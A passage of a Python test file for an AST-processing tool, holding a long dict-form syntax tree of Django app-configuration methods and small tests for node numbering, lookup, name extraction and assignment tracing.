'Load'}]}, {'name': 'Load'}]}]}]}, {'name': 'list[]'}, {'name': 'NoneType'}]}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=_path_from_module)'}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)'}, {'name': 'NoneType'}]}, {'name': 'arg', 'children': [{'name': 'str(str=module)'}, {'name': 'NoneType'}]}, {'name': 'NoneType'}, {'name': 'list[]'}, {'name': 'list[]'}, {'name': 'NoneType'}, {'name': 'list[]'}]}, {'name': 'Expr', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}]}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=list)'}, {'name': 'Load'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=getattr)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Load'}]}, {'name': 'Str', 'children': [{'name': 'str(str=__path__)'}]}, {'name': 'List', 'children': [{'name': 'list[]'}, {'name': 'Load'}]}, {'name': 'list[]'}]}, {'name': 'list[]'}]}]}, {'name': 'If', 'children': [{'name': 'Compare', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=len)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}, {'name': 'NotEq'}, {'name': 'Num', 'children': [{'name': 'int(int=1)'}]}]}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=filename)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=getattr)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Load'}]}, {'name': 'Str', 'children': [{'name': 'str(str=__file__)'}]}, {'name': 'NameConstant', 'children': [{'name': 'NoneType'}]}, {'name': 'list[]'}]}]}, {'name': 'If', 'children': [{'name': 'Compare', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=filename)'}, {'name': 'Load'}]}, {'name': 'IsNot'}, {'name': 'NameConstant', 'children': [{'name': 'NoneType'}]}]}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Store'}]}, {'name': 'List', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=os)'}, {'name': 'Load'}]}, {'name': 'str(str=path)'}, {'name': 'Load'}]}, {'name': 'str(str=dirname)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=filename)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}, {'name': 'Load'}]}]}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=list)'}, {'name': 'Load'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=set)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}, {'name': 'list[]'}]}]}]}, {'name': 'list[]'}]}, {'name': 'If', 'children': [{'name': 'Compare', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=len)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}, {'name': 'Gt'}, {'name': 'Num', 'children': [{'name': 'int(int=1)'}]}]}, {'name': 'Raise', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=ImproperlyConfigured)'}, {'name': 'Load'}]}, {'name': 'BinOp', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'Mod'}, {'name': 'Tuple', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Load'}]}, {'name': 'Load'}]}]}, {'name': 'list[]'}]}, {'name': 'NoneType'}]}, {'name': 'If', 'children': [{'name': 'UnaryOp', 'children': [{'name': 'Not'}, {'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Load'}]}]}, {'name': 'Raise', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=ImproperlyConfigured)'}, {'name': 'Load'}]}, {'name': 'BinOp', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'Mod'}, {'name': 'Tuple', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Load'}]}, {'name': 'Load'}]}]}, {'name': 'list[]'}]}, {'name': 'NoneType'}]}, {'name': 'list[]'}]}]}, {'name': 'Return', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=upath)'}, {'name': 'Load'}]}, {'name': 'Subscript', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=paths)'}, {'name': 'Load'}]}, {'name': 'Index', 'children': [{'name': 'Num', 'children': [{'name': 'int(int=0)'}]}]}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'list[]'}, {'name': 'NoneType'}]}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=create)'}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=cls)'}, {'name': 'NoneType'}]}, {'name': 'arg', 'children': [{'name': 'str(str=entry)'}, {'name': 'NoneType'}]}, {'name': 'NoneType'}, {'name': 'list[]'}, {'name': 'list[]'}, {'name': 'NoneType'}, {'name': 'list[]'}]}, {'name': 'Expr', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}]}, {'name': 'Try', 'children': [{'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=import_module)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=entry)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'ExceptHandler', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=ImportError)'}, {'name': 'Load'}]}, {'name': 'NoneType'}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Store'}]}, {'name': 'NameConstant', 'children': [{'name': 'NoneType'}]}]}, {'name': 'Assign', 'children': [{'name': 'Tuple', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=mod_path)'}, {'name': 'Store'}]}, {'name': 'Name', 'children': [{'name': 'str(str=_)'}, {'name': 'Store'}]}, {'name': 'Name', 'children': [{'name': 'str(str=cls_name)'}, {'name': 'Store'}]}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=entry)'}, {'name': 'Load'}]}, {'name': 'str(str=rpartition)'}, {'name': 'Load'}]}, {'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'list[]'}]}]}, {'name': 'If', 'children': [{'name': 'UnaryOp', 'children': [{'name': 'Not'}, {'name': 'Name', 'children': [{'name': 'str(str=mod_path)'}, {'name': 'Load'}]}]}, {'name': 'Raise', 'children': [{'name': 'NoneType'}, {'name': 'NoneType'}]}, {'name': 'list[]'}]}]}, {'name': 'Try', 'children': [{'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=entry)'}, {'name': 'Store'}]}, {'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Load'}]}, {'name': 'str(str=default_app_config)'}, {'name': 'Load'}]}]}, {'name': 'ExceptHandler', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=AttributeError)'}, {'name': 'Load'}]}, {'name': 'NoneType'}, {'name': 'Return', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=cls)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=entry)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}]}, {'name': 'Assign', 'children': [{'name': 'Tuple', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=mod_path)'}, {'name': 'Store'}]}, {'name': 'Name', 'children': [{'name': 'str(str=_)'}, {'name': 'Store'}]}, {'name': 'Name', 'children': [{'name': 'str(str=cls_name)'}, {'name': 'Store'}]}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=entry)'}, {'name': 'Load'}]}, {'name': 'str(str=rpartition)'}, {'name': 'Load'}]}, {'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'list[]'}]}]}, {'name': 'list[]'}]}, {'name': 'list[]'}]}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=mod)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=import_module)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=mod_path)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'Try', 'children': [{'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=cls)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=getattr)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=mod)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=cls_name)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'ExceptHandler', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=AttributeError)'}, {'name': 'Load'}]}, {'name': 'NoneType'}, {'name': 'If', 'children': [{'name': 'Compare', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=module)'}, {'name': 'Load'}]}, {'name': 'Is'}, {'name': 'NameConstant', 'children': [{'name': 'NoneType'}]}]}, {'name': 'Expr', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=import_module)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=entry)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'Raise', 'children': [{'name': 'NoneType'}, {'name': 'NoneType'}]}]}]}, {'name': 'list[]'}, {'name': 'list[]'}]}, {'name': 'If', 'children': [{'name': 'UnaryOp', 'children': [{'name': 'Not'}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=issubclass)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=cls)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=AppConfig)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'Raise', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=ImproperlyConfigured)'}, {'name': 'Load'}]}, {'name': 'BinOp', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'Mod'}, {'name': 'Name', 'children': [{'name': 'str(str=entry)'}, {'name': 'Load'}]}]}, {'name': 'list[]'}]}, {'name': 'NoneType'}]}, {'name': 'list[]'}]}, {'name': 'Try', 'children': [{'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=app_name)'}, {'name': 'Store'}]}, {'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=cls)'}, {'name': 'Load'}]}, {'name': 'str(str=name)'}, {'name': 'Load'}]}]}, {'name': 'ExceptHandler', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=AttributeError)'}, {'name': 'Load'}]}, {'name': 'NoneType'}, {'name': 'Raise', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=ImproperlyConfigured)'}, {'name': 'Load'}]}, {'name': 'BinOp', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'Mod'}, {'name': 'Name', 'children': [{'name': 'str(str=entry)'}, {'name': 'Load'}]}]}, {'name': 'list[]'}]}, {'name': 'NoneType'}]}]}, {'name': 'list[]'}, {'name': 'list[]'}]}, {'name': 'Try', 'children': [{'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=app_module)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=import_module)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=app_name)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'ExceptHandler', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=ImportError)'}, {'name': 'Load'}]}, {'name': 'NoneType'}, {'name': 'Raise', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=ImproperlyConfigured)'}, {'name': 'Load'}]}, {'name': 'BinOp', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'Mod'}, {'name': 'Tuple', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=app_name)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=mod_path)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=cls_name)'}, {'name': 'Load'}]}, {'name': 'Load'}]}]}, {'name': 'list[]'}]}, {'name': 'NoneType'}]}]}, {'name': 'list[]'}, {'name': 'list[]'}]}, {'name': 'Return', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=cls)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=app_name)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=app_module)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'Name', 'children': [{'name': 'str(str=classmethod)'}, {'name': 'Load'}]}, {'name': 'NoneType'}]}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=get_model)'}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)'}, {'name': 'NoneType'}]}, {'name': 'arg', 'children': [{'name': 'str(str=model_name)'}, {'name': 'NoneType'}]}, {'name': 'arg', 'children': [{'name': 'str(str=require_ready)'}, {'name': 'NoneType'}]}, {'name': 'NoneType'}, {'name': 'list[]'}, {'name': 'list[]'}, {'name': 'NoneType'}, {'name': 'NameConstant', 'children': [{'name': 'bool(int=True)'}]}]}, {'name': 'Expr', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}]}, {'name': 'If', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=require_ready)'}, {'name': 'Load'}]}, {'name': 'Expr', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=apps)'}, {'name': 'Load'}]}, {'name': 'str(str=check_models_ready)'}, {'name': 'Load'}]}, {'name': 'list[]'}, {'name': 'list[]'}]}]}, {'name': 'Expr', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=apps)'}, {'name': 'Load'}]}, {'name': 'str(str=check_apps_ready)'}, {'name': 'Load'}]}, {'name': 'list[]'}, {'name': 'list[]'}]}]}]}, {'name': 'Try', 'children': [{'name': 'Return', 'children': [{'name': 'Subscript', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=models)'}, {'name': 'Load'}]}, {'name': 'Index', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=model_name)'}, {'name': 'Load'}]}, {'name': 'str(str=lower)'}, {'name': 'Load'}]}, {'name': 'list[]'}, {'name': 'list[]'}]}]}, {'name': 'Load'}]}]}, {'name': 'ExceptHandler', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=KeyError)'}, {'name': 'Load'}]}, {'name': 'NoneType'}, {'name': 'Raise', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=LookupError)'}, {'name': 'Load'}]}, {'name': 'BinOp', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'Mod'}, {'name': 'Tuple', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=label)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=model_name)'}, {'name': 'Load'}]}, {'name': 'Load'}]}]}, {'name': 'list[]'}]}, {'name': 'NoneType'}]}]}, {'name': 'list[]'}, {'name': 'list[]'}]}, {'name': 'list[]'}, {'name': 'NoneType'}]}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=get_models)'}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)'}, {'name': 'NoneType'}]}, {'name': 'arg', 'children': [{'name': 'str(str=include_auto_created)'}, {'name': 'NoneType'}]}, {'name': 'arg', 'children': [{'name': 'str(str=include_swapped)'}, {'name': 'NoneType'}]}, {'name': 'NoneType'}, {'name': 'list[]'}, {'name': 'list[]'}, {'name': 'NoneType'}, {'name': 'NameConstant', 'children': [{'name': 'bool(int=False)'}]}, {'name': 'NameConstant', 'children': [{'name': 'bool(int=False)'}]}]}, {'name': 'Expr', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}]}, {'name': 'Expr', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=apps)'}, {'name': 'Load'}]}, {'name': 'str(str=check_models_ready)'}, {'name': 'Load'}]}, {'name': 'list[]'}, {'name': 'list[]'}]}]}, {'name': 'For', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=model)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=models)'}, {'name': 'Load'}]}, {'name': 'str(str=values)'}, {'name': 'Load'}]}, {'name': 'list[]'}, {'name': 'list[]'}]}, {'name': 'If', 'children': [{'name': 'BoolOp', 'children': [{'name': 'And'}, {'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=model)'}, {'name': 'Load'}]}, {'name': 'str(str=_meta)'}, {'name': 'Load'}]}, {'name': 'str(str=auto_created)'}, {'name': 'Load'}]}, {'name': 'UnaryOp', 'children': [{'name': 'Not'}, {'name': 'Name', 'children': [{'name': 'str(str=include_auto_created)'}, {'name': 'Load'}]}]}]}, {'name': 'Continue'}, {'name': 'list[]'}]}, {'name': 'If', 'children': [{'name': 'BoolOp', 'children': [{'name': 'And'}, {'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=model)'}, {'name': 'Load'}]}, {'name': 'str(str=_meta)'}, {'name': 'Load'}]}, {'name': 'str(str=swapped)'}, {'name': 'Load'}]}, {'name': 'UnaryOp', 'children': [{'name': 'Not'}, {'name': 'Name', 'children': [{'name': 'str(str=include_swapped)'}, {'name': 'Load'}]}]}]}, {'name': 'Continue'}, {'name': 'list[]'}]}, {'name': 'Expr', 'children': [{'name': 'Yield', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=model)'}, {'name': 'Load'}]}]}]}, {'name': 'list[]'}]}, {'name': 'list[]'}, {'name': 'NoneType'}]}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=import_models)'}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)'}, {'name': 'NoneType'}]}, {'name': 'NoneType'}, {'name': 'list[]'}, {'name': 'list[]'}, {'name': 'NoneType'}, {'name': 'list[]'}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=models)'}, {'name': 'Store'}]}, {'name': 'Subscript', 'children': [{'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=apps)'}, {'name': 'Load'}]}, {'name': 'str(str=all_models)'}, {'name': 'Load'}]}, {'name': 'Index', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=label)'}, {'name': 'Load'}]}]}, {'name': 'Load'}]}]}, {'name': 'If', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=module_has_submodule)'}, {'name': 'Load'}]}, {'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=module)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=MODELS_MODULE_NAME)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=models_module_name)'}, {'name': 'Store'}]}, {'name': 'BinOp', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'Mod'}, {'name': 'Tuple', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=name)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=MODELS_MODULE_NAME)'}, {'name': 'Load'}]}, {'name': 'Load'}]}]}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=models_module)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=import_module)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=models_module_name)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'list[]'}]}, {'name': 'list[]'}, {'name': 'NoneType'}]}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=ready)'}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)'}, {'name': 'NoneType'}]}, {'name': 'NoneType'}, {'name': 'list[]'}, {'name': 'list[]'}, {'name': 'NoneType'}, {'name': 'list[]'}]}, {'name': 'Expr', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}]}, {'name': 'list[]'}, {'name': 'NoneType'}]}, {'name': 'list[]'}]}]}
assert add_node_id(a,1)
b={'name': 'Module', 'children': [{'name': 'Import', 'children': [{'name': 'sss'}]}]}
add_node_id(b, 1)
assert b=={'name': 'Module', 'id':1,'children': [{'name': 'Import', 'id':2,'children': [{'name': 'sss','id':3}]}]}
def test_get_node():
b = {'name': 'Module', 'id':1,'children': [{'name': 'Import', 'id':2,'children': [{'name': 'sss','id':3}]}]}
assert get_node(b,3)=={'name': 'sss', 'id': 3}
def test_get_name_value():
# case1
a={'name': 'Name', 'children': [{'name': 'str(str=data)', 'id': 374}, {'name': 'Store', 'id': 375}], 'id': 373}
assert get_name_value(a)=='str(str=data)'
# case2
a={'name': 'str(str=argv)', 'id': 35}
assert get_name_value(a)=='str(str=argv)'
# case3
a={'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 385}, {'name': 'Load', 'id': 386}], 'id': 384}, {'name': 'str(str=_current)', 'id': 387}, {'name': 'Load', 'id': 388}], 'id': 383}
assert get_name_value(a)=='self._current'
# case4
a={'name': 'keyword', 'children': [{'name': 'str(str=dir)', 'id': 36}, {'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 39}, {'name': 'Load', 'id': 40}], 'id': 38}, {'name': 'str(str=_dir)', 'id': 41}, {'name': 'Load', 'id': 42}], 'id': 37}], 'id': 35}
assert get_name_value(a)=='str(str=dir)######self._dir'
def test_get_arg_value():
# see ./get_arg_value/demo.py
a={'name': 'arg', 'children': [{'name': 'str(str=a)', 'id': 6}, {'name': 'NoneType', 'id': 7}], 'id': 5}
assert get_arg_value(a)=='str(str=a)'
def test_get_all_assigns():
# demo code in test/get_all_assigns/demo.py
begin_id=2
end_id=45
node_dict={'name': 'Module', 'children': [{'name': 'FunctionDef', 'children': [{'name': 'str(str=set)', 'id': 3}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=a)', 'id': 6}, {'name': 'NoneType', 'id': 7}], 'id': 5}, {'name': 'arg', 'children': [{'name': 'str(str=b)', 'id': 9}, {'name': 'NoneType', 'id': 10}], 'id': 8}, {'name': 'NoneType', 'id': 11}, {'name': 'list[]', 'id': 12}, {'name': 'list[]', 'id': 13}, {'name': 'NoneType', 'id': 14}, {'name': 'list[]', 'id': 15}], 'id': 4}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=c)', 'id': 18}, {'name': 'Store', 'id': 19}], 'id': 17}, {'name': 'BinOp', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=a)', 'id': 22}, {'name': 'Load', 'id': 23}], 'id': 21}, {'name': 'Add', 'id': 24}, {'name': 'Name', 'children': [{'name': 'str(str=b)', 'id': 26}, {'name': 'Load', 'id': 27}], 'id': 25}], 'id': 20}], 'id': 16}, {'name': 'Expr', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=pickle)', 'id': 32}, {'name': 'Load', 'id': 33}], 'id': 31}, {'name': 'str(str=loads)', 'id': 34}, {'name': 'Load', 'id': 35}], 'id': 30}, {'name': 'Name', 'children': [{'name': 'str(str=c)', 'id': 37}, {'name': 'Load', 'id': 38}], 'id': 36}, {'name': 'list[]', 'id': 39}], 'id': 29}], 'id': 28}, {'name': 'Return', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=c)', 'id': 42}, {'name': 'Load', 'id': 43}], 'id': 41}], 'id': 40}, {'name': 'list[]', 'id': 44}, {'name': 'NoneType', 'id': 45}], 'id': 2}], 'id': 1}
assert get_all_assigns(node_dict,(begin_id,end_id))=='left:str(str=a),right:fp$$$$$$left:str(str=b),right:fp$$$$$$left:str(str=c),right:str(str=a)######str(str=b)'
def test_get_all_functiondef():
#demo code in test/get_all_functiondef
node_dict={'name': 'Module', 'children': [{'name': 'Expr', 'children': [{'name': 'Str', 'children': [{'name': 'str', 'id': 4}], 'id': 3}], 'id': 2}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=Add)', 'id': 6}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=a)', 'id': 9}, {'name': 'NoneType', 'id': 10}], 'id': 8}, {'name': 'arg', 'children': [{'name': 'str(str=b)', 'id': 12}, {'name': 'NoneType', 'id': 13}], 'id': 11}, {'name': 'NoneType', 'id': 14}, {'name': 'list[]', 'id': 15}, {'name': 'list[]', 'id': 16}, {'name': 'NoneType', 'id': 17}, {'name': 'list[]', 'id': 18}], 'id': 7}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=c)', 'id': 21}, {'name': 'Store', 'id': 22}], 'id': 20}, {'name': 'BinOp', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=a)', 'id': 25}, {'name': 'Load', 'id': 26}], 'id': 24}, {'name': 'Add', 'id': 27}, {'name': 'Name', 'children': [{'name': 'str(str=b)', 'id': 29}, {'name': 'Load', 'id': 30}], 'id': 28}], 'id': 23}], 'id': 19}, {'name': 'Return', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=c)', 'id': 33}, {'name': 'Load', 'id': 34}], 'id': 32}], 'id': 31}, {'name': 'list[]', 'id': 35}, {'name': 'NoneType', 'id': 36}], 'id': 5}, {'name': 'ClassDef', 'children': [{'name': 'str(str=A)', 'id': 38}, {'name': 'list[]', 'id': 39}, {'name': 'list[]', 'id': 40}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=__init__)', 'id': 42}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)', 'id': 45}, {'name': 'NoneType', 'id': 46}], 'id': 44}, {'name': 'arg', 'children': [{'name': 'str(str=name)', 'id': 48}, {'name': 'NoneType', 'id': 49}], 'id': 47}, {'name': 'NoneType', 'id': 50}, {'name': 'list[]', 'id': 51}, {'name': 'list[]', 'id': 52}, {'name': 'NoneType', 'id': 53}, {'name': 'list[]', 'id': 54}], 'id': 43}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 58}, {'name': 'Load', 'id': 59}], 'id': 57}, {'name': 'str(str=name)', 'id': 60}, {'name': 'Store', 'id': 61}], 'id': 56}, {'name': 'Name', 'children': [{'name': 'str(str=name)', 'id': 63}, {'name': 'Load', 'id': 64}], 'id': 62}], 'id': 55}, {'name': 'list[]', 'id': 65}, {'name': 'NoneType', 'id': 66}], 'id': 41}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=func1)', 'id': 68}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)', 'id': 71}, {'name': 'NoneType', 